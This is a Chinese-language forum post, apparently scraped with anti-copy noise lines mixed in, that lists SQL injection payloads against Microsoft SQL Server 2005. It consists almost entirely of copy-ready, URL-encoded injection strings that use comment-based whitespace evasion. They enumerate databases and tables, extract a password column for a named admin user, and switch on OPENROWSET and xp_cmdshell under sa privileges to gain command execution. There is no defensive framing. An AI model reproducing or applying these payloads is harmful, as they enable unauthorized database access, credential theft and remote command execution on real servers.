MSsql2005注入语句

admin

* ^9 i: f% o& z# Q1 i
) k7 F& l7 j" }* a
8 e4 ?8 T' o' f6 f0 F* u[Copy to clipboard]CODE:
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
2 W* l8 \! A9 O* X( h, l4 _
+ l- t& S" \  o爆表语句,somedb部份是所要列的数据库，红色数字1累加

+ L9 p6 {8 U1 \% G4 J8 t
[Copy to clipboard]CODE:
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
2 a! e; t/ V1 v5 i" ?6 r
9 M/ g8 [2 h4 C. p+ I8 Y爆字段语句，爆表admin里user='icerover'的密码段
5 G9 i# R1 ~, X$ A

[Copy to clipboard]CODE:
0 m) y8 M5 C. b  h' d3 z/ w' n**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--

mssql2005默认没有开xp_cmdshell的，openrowset也不能用
如果是sa权限，可以这样来开启
. @* W3 `' i+ k$ I. F开启openrowset
9 f- J: o) n0 L( }1 R; u/ Q3 D

[Copy to clipboard]CODE:
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
3 f, x. V% d7 k; Y; K- ~/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--

8 W2 A0 e6 @9 }1 M: \: Q开启xp_cmdshell

/ F) h1 a! [' z1 d) k. n, R/ m8 q
[Copy to clipboard]CODE:
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
. K/ @; I: \3 I4 n  H( E8 \
4 K9 l) T1 G( |0 s7 Rok,over~~晚安